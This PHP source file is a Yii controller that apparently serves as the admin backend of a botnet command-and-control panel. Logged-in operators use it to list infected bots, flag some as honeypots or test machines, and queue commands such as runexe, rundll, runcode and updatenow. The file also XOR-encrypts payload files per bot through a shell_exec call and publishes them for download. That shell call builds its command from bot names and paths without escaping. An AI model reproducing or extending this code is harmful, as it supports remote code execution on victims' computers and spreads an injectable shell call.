<?php

namespace backend\controllers;

use Yii;
use common\models\Bots;
use common\models\Commands;
use common\models\Files;
use common\models\Clones;
use backend\models\TestbotsSearch;
use backend\models\Admin;
use yii\web\Controller;
use yii\web\NotFoundHttpException;
use yii\filters\VerbFilter;
use \yii\web\Response;
use yii\helpers\Html;
use yii\db\Expression;
use yii\helpers\Json;
use yii\helpers\FileHelper;
use yii\helpers\Url;
use common\models\Settings;

/**
 * BotsController implements the CRUD actions for Bots model.
 */
class TestbotsController extends Controller
{
    /**
     * @inheritdoc
     */
    public function behaviors()
    {
        return [
            'verbs' => [
                'class' => VerbFilter::className(),
                'actions' => [
                    'delete' => ['post'],
                    'bulk-delete' => ['post'],
                ],
            ],
        ];
    }

    /**
     * Lists all Bots models.
     * @return mixed
     */
    public function actionIndex()
    {  
        if (Yii::$app->user->isGuest) {
            return $this->goHome();
        }
        $accessFilter = json_decode(Yii::$app->user->identity->groups);

        $searchModel = new TestbotsSearch();
        $dataProvider = $searchModel->search(Yii::$app->request->queryParams);

        if (Yii::$app->request->post('hasEditable')) {
            $commentId = Yii::$app->request->post('editableKey');
            $model = Bots::findOne(['id' => $commentId]);
            if(Yii::$app->user->identity->role != Admin::ROLE_SUPER_ADMIN){
                if(!in_array($model->group,$accessFilter)){
                    return $this->goHome();
                }
            }
            $out = Json::encode(['output'=>'', 'message'=>'']);
            $posted = current($_POST['Bots']);
            $model->comment = $posted['comment'];
            $model->save(false);
            Yii::info('Admin '. Yii::$app->user->identity->login . ' wrote comment to bot ' . $model->bot, $category = 'admininfo');
            echo $out;
            return;
            
        }
        return $this->render('index', [
            'searchModel' => $searchModel,
            'dataProvider' => $dataProvider,
        ]);
    }

    public function actionBotoptions($id)
    {
        if (Yii::$app->user->isGuest) {
            return $this->goHome();
        }
        $accessFilter = json_decode(Yii::$app->user->identity->groups);

        $request = Yii::$app->request;
        $model = $this->findModel(Bots::find()->where(['like', 'bot', $id])->one()['id']);
        if(Yii::$app->user->identity->role != Admin::ROLE_SUPER_ADMIN){
            if(!in_array($model->group,$accessFilter)){
                return $this->goHome();
            }
        }
            
        if($request->isPost){
            if ($model->load($request->post()) && $model->save(false)) {
                return $this->redirect('/testbots/command?id='.$model->bot);
            }
        }

    }

    /**
     * Delete an existing Bots model.
     * For ajax request will return json object
     * and for non-ajax request if deletion is successful, the browser will be redirected to the 'index' page.
     * @param integer $id
     * @return mixed
     */
    public function actionDelete($id)
    {
        if (Yii::$app->user->isGuest || Yii::$app->user->identity->role != Admin::ROLE_SUPER_ADMIN) {
            return $this->goHome();
        }
        
        $request = Yii::$app->request;
        // remove all related files in web-access area
        FileHelper::removeDirectory(Yii::getAlias('@absPath').'/api/web/'.$id);

        FileHelper::removeDirectory(Yii::getAlias('@absPath').'/api/web/downloads/'.$id);

        FileHelper::removeDirectory(Yii::getAlias('@absPath').'/frontend/web/'.$id);

        // delete all bot's commands
        Commands::deleteAll(['bot_id'=>Bots::findByBotName($id)]);

        // delete bot
        $this->findModel(Bots::findByBotName($id))->delete();

        Yii::info('Admin '. Yii::$app->user->identity->login . ' delete bot ' . $id, $category = 'admininfo');

        if($request->isAjax){
            /*
            *   Process for ajax request
            */
            Yii::$app->response->format = Response::FORMAT_JSON;
            return ['forceClose'=>true,'forceReload'=>'#crud-datatable-pjax'];
        }else{
            /*
            *   Process for non-ajax request
            */
            return $this->redirect(['index']);
        }


    }

    
    /**
     * Displays a single Files model.
     * @param string $id
     * @return mixed
     */
    public function actionHoneypot($id)
    {   
        if (Yii::$app->user->isGuest) {
            return $this->goHome();
        }

        $accessFilter = json_decode(Yii::$app->user->identity->groups);

        $b = Bots::findOne(['id'=>Bots::findByBotName($id)]);

        if(Yii::$app->user->identity->role != Admin::ROLE_SUPER_ADMIN){
            if(!in_array($b->group,$accessFilter)){
                return $this->goHome();
            }
        }

        $b->type = 1;
        $b->save(false);
        $request = Yii::$app->request;
        if($request->isAjax){
            Yii::$app->response->format = Response::FORMAT_JSON;
            return ['forceClose'=>true,'forceReload'=>'#crud-datatable-pjax'];    
        }else{
            return redirect(['index']);
        }
    }

    /**
     * Displays a single Files model.
     * @param string $id
     * @return mixed
     */
    public function actionTestbot($id)
    {   
        if (Yii::$app->user->isGuest) {
            return $this->goHome();
        }

        $accessFilter = json_decode(Yii::$app->user->identity->groups);

        $b = Bots::findOne(['id'=>Bots::findByBotName($id)]);

        if(Yii::$app->user->identity->role != Admin::ROLE_SUPER_ADMIN){
            if(!in_array($b->group,$accessFilter)){
                return $this->goHome();
            }
        }
        
        $b->type = 2;
        $b->save(false);
        $request = Yii::$app->request;
        if($request->isAjax){
            Yii::$app->response->format = Response::FORMAT_JSON;
            return ['forceClose'=>true,'forceReload'=>'#crud-datatable-pjax'];    
        }else{
            return redirect(['index']);
        }
    }

    public function actionJustbot($id)
    {   
        if (Yii::$app->user->isGuest) {
            return $this->goHome();
        }

        $accessFilter = json_decode(Yii::$app->user->identity->groups);

        $b = Bots::findOne(['id'=>Bots::findByBotName($id)]);

        if(Yii::$app->user->identity->role != Admin::ROLE_SUPER_ADMIN){
            if(!in_array($b->group,$accessFilter)){
                return $this->goHome();
            }
        }
            
        $b->type = 0;
        $b->save(false);
        $request = Yii::$app->request;
        if($request->isAjax){
            Yii::$app->response->format = Response::FORMAT_JSON;
            return ['forceClose'=>true,'forceReload'=>'#crud-datatable-pjax'];    
        }else{
            return redirect(['index']);
        }
    }

    public function actionAutorefreshchanged($a)
    {   
        Admin::setAdminSettingValue('autorefresh',$a);
        return $a;
    }

    /**
     * Finds the Bots model based on its primary key value.
     * If the model is not found, a 404 HTTP exception will be thrown.
     * @param integer $id
     * @return Bots the loaded model
     * @throws NotFoundHttpException if the model cannot be found
     */
    protected function findModel($id)
    {
        if (($model = Bots::findOne($id)) !== null) {
            return $model;
        } else {
            throw new NotFoundHttpException('The requested page does not exist.');
        }
    }

    
    public function actionCommand($id)
    {
        if (Yii::$app->user->isGuest) {
            return $this->goHome();
        }

        $accessFilter = json_decode(Yii::$app->user->identity->groups);

        $request = Yii::$app->request;
        $model = $this->findModel(Bots::find()->where(['like', 'bot', $id])->one()['id']);

        if(Yii::$app->user->identity->role != Admin::ROLE_SUPER_ADMIN){
            if(!in_array($model->group,$accessFilter)){
                return $this->goHome();
            }
        }
        
        $relatedModel = New Commands();
        //$relatedModel = Commands::find(['bot_id' => $model['bot']])->all(); 
                
        if($request->isGet){ // render
            //$id = Bots::find()->where(['like', 'bot', $id])->one()['id']; // id as botid
            return $this->render('command', [
                'model' => $model,
                'relatedModel' => $relatedModel,
            ]);
        }elseif($request->isPost){
            if ($model->load($request->post()) && $model->save(false)) {
                if(isset($model->field0)){

                    // parse command
                    //$commandParsed = explode(':',$model->lastcommand);
                    $commandParsed[0] = $model->field0; // allways

                    $commandParsed[1] = $model->field1;
                    $commandParsed[2] = $model->field2;
                    $commandParsed[3] = $model->field3;
                    $commandParsed[4] = $model->field4;
                    $commandParsed[5] = $model->field5;
                    if($commandParsed[0]!='runcode'){ // not for run code
                        if($model->field6!=''){
                            $commandParsed[6] = '\r\n'.$model->field6; // divider before script
                        }
                    }else{
                        $commandParsed[6] = $model->field6;
                    }
                    $commandParsed[7] = ($model->field0=="runexe" || $model->field0=="rundll" || $model->field0=="updatenow") ? "" : $model->field7;
                    //$commandParsed[7] = $model->field7;
                    
                    foreach ($commandParsed as $key => $value){ 
                        if ($value === ""){ 
                            unset($commandParsed[$key]);
                            $commandParsed[] = $value;
                        }
                    }

                    // rebuild array index
                    $commandParsed = array_values($commandParsed);
                    //print_r($commandParsed);die();

                    // 4-th param passed, but set as empty
                    // 7-th param script body replace \t on __
                    $usercommand = $model->field0.chr(9).$model->field1.chr(9).$model->field2.chr(9).$model->field3.chr(9).chr(9).$model->field5.chr(9).$model->field6.chr(9).str_replace(chr(9), '  ', $model->field7);
                   
                    $upd = ($commandParsed[0]=='updatenow') ? 1 : 0; // 10 update flag

                    $commandParsed[0] = Bots::CommandsList($commandParsed[0]);

                    //print_r($upd);die();
                    switch ($commandParsed[0]) {
                        case '0':
                            //$commandParsed[1] = $commandParsed[1];
                            //$model->busy = 0; // busy not set for command nop
                            //$model->save(false);
                            break;
                        case '1':
                            # code...
                            break;
                        case '10':
                        
                            $commandParsed[1] = Bots::RuntypeList($commandParsed[1]);
                           
                            if($commandParsed[1]!='4'){
                                $commandParsed[3] = Bots::MaskList($commandParsed[3]);
                            }
                            
                            
                            break;
                        case '11':
                            //$commandParsed[1] = Bots::RuntypeList($commandParsed[1]);
                            break;
                        case '12':
                            $commandParsed[1] = Bots::RuntypeList($commandParsed[1]);
                            $commandParsed[3] = str_replace(chr(13).chr(10), '\r\n', $commandParsed[3]);
                            //$commandParsed[4] = '\r\n'.$commandParsed[4]; // may changed?
                            break;
                        case '13':
                            $commandParsed[1] = Bots::RuntypeList($commandParsed[1]);
                            $commandParsed[3] = str_replace(chr(13).chr(10), '\r\n', $commandParsed[3]);
                            //$commandParsed[4] = '\r\n'.$commandParsed[4];
                            break;
                        case '14':
                            Commands::updateAll(['status' => 2], ['and', ['bot_id' => $model->id], ['<=','status', 1]]);
                            break;
                        case '15':
                            # code...
                            break;
                        case '16':
                            # code...
                            break;
                        case '17':
                            # code...
                            break;
                        
                        default:
                            # code...
                            break;
                    }
                    // end recoding
// TODO if emty file - error 2   
//print_r($commandParsed);die();                 
                    if($commandParsed[0]==10 || $commandParsed[0]==11){

                        if(!($commandParsed[2] == 'nofile' || $commandParsed[4] == 'nofile')){
                            // prepare file for download if not force update

                            // make replace link
                            $filedest = $model->bot.'/'.Yii::$app->security->generateRandomString(40);
                            
                            // get command link and replace
                            if($commandParsed[0]==10){
                                $c = 4; // 0-3 subcommand
                                if($commandParsed[1]=='4'){
                                    $c = 2; // 4 subcommand
                                }
                            }else{
                                $c = 2; // 11 command
                            }

                            // set  bot group to file
                            $f = Files::findOne(['storedfilename' => $commandParsed[$c]]);
                            $f->group = $model->group;
                            $f->save(false);

                            $filepath = Yii::getAlias('@absPath').$commandParsed[$c];
                            $sourcepath = $commandParsed[$c];

                            //$commandParsed[$c] = str_replace(Yii::$app->params['backend'],'',Url::base(true)).'/'.$filedest;

                            $commandParsed[$c] = Url::base(true).'/'.$filedest;

                            $commandParsed[$c] = '/'.$filedest; // test

                            // make bot path into web area
                            FileHelper::createDirectory(Yii::getAlias('@absPath').'/api/web/'.$model->bot);

                            // make shell for crypt and copy to web area
                            $shellcommand = 'cd '.Yii::getAlias('@absPath').'/utilities; ./xor '.$model->bot.' '.$filepath.' '.'../api/web/'.$filedest; // TODO new generator need

                            // fix clone
                            $clone = New Clones();
                            $clone->source = $sourcepath;
                            $clone->clone = '/'.$filedest;
                            $clone->clonetype = 0; // file for command 10
                            $clone->save(false);
                            
                            $e = shell_exec($shellcommand);
                        }else{
                            $commandParsed[2] = '';
                        }
                    }
                    //print_r($commandParsed);die();
                    $newcommand = '';
                    foreach ($commandParsed as $key => $value) {
                        $newcommand .= $value.' ';
                    }

                    //print_r($commandParsed);die();

                    if($commandParsed[0] > 1000){ // force update
                        $model->busy = 0;
                        $model->save(false);
                        $relatedModel->status = 2;
                    }

                    $relatedModel->command = trim($newcommand);
                    $relatedModel->usercommand = trim($usercommand);
                    $relatedModel->created_at = new Expression('NOW()');
                    $relatedModel->admin = Yii::$app->user->id;
                    $relatedModel->commandtype = $commandParsed[0];
                    $relatedModel->bot_id = $model->id;
                    $relatedModel->ip = $model->ip;
                    $relatedModel->group = $model->group;
                    $relatedModel->save(false);

                    Yii::info('Admin '. Yii::$app->user->identity->login . ' takes command '.$relatedModel->command.' to bot ' . $model->bot, $category = 'admininfo');
                }

                return $this->redirect(Yii::$app->request->url);
            }else{
                Yii::info('Admin '. Yii::$app->user->identity->login . ' changes bot ' . $model->bot . ' info', $category = 'admininfo');
            }
        }else{

            return $this->redirect(['index']);
        }
    }

    public function actionDownloadresult($id)
    {
        $model = Commands::findOne($id);
        header('Content-Description: File Transfer');
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename=Command-'.$model->id.'-'.$model->bot_id.'.conf');
        header('Content-Transfer-Encoding: binary');
        header('Expires: 0');
        header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
        header('Pragma: public');
        header('Content-Length: ' . strlen($model->result));
        ob_start();
        echo $model->result;
    }

    
    /*public function actionRepeat($id)
    {
        $model = Commands::findOne($id);
        
        $bot_id = $model->bot_id;
        $command = $model->command;
        $commandtype = $model->commandtype;
        $usercommand = $model->usercommand;
        
        $model = New Commands();
        
        $model->status = 0;
        $model->created_at = new Expression('NOW()');
        $model->admin = Yii::$app->user->identity->id;
        $model->bot_id = $bot_id;
        $model->command = $command;
        $model->commandtype = $commandtype;
        $model->usercommand = $usercommand;
        $model->save(false);

        $model = Bots::findone($bot_id);
        $model->busy = 1;
        $model->save(false);

        Yii::$app->response->format = Response::FORMAT_JSON;
            
        return [
                    'forceReload'=>'#crud-datatable-pjax',
                    'title'=> "Bots #".$id,
                    'content'=>$this->renderAjax('view', [
                        'model' => $model,
                    ]),
                    'footer'=> Html::button('Close',['class'=>'btn btn-default pull-left','data-dismiss'=>"modal"]).
                            Html::a('Edit',['update','id'=>$id],['class'=>'btn btn-primary','role'=>'modal-remote'])
                ]; 
    }*/

}
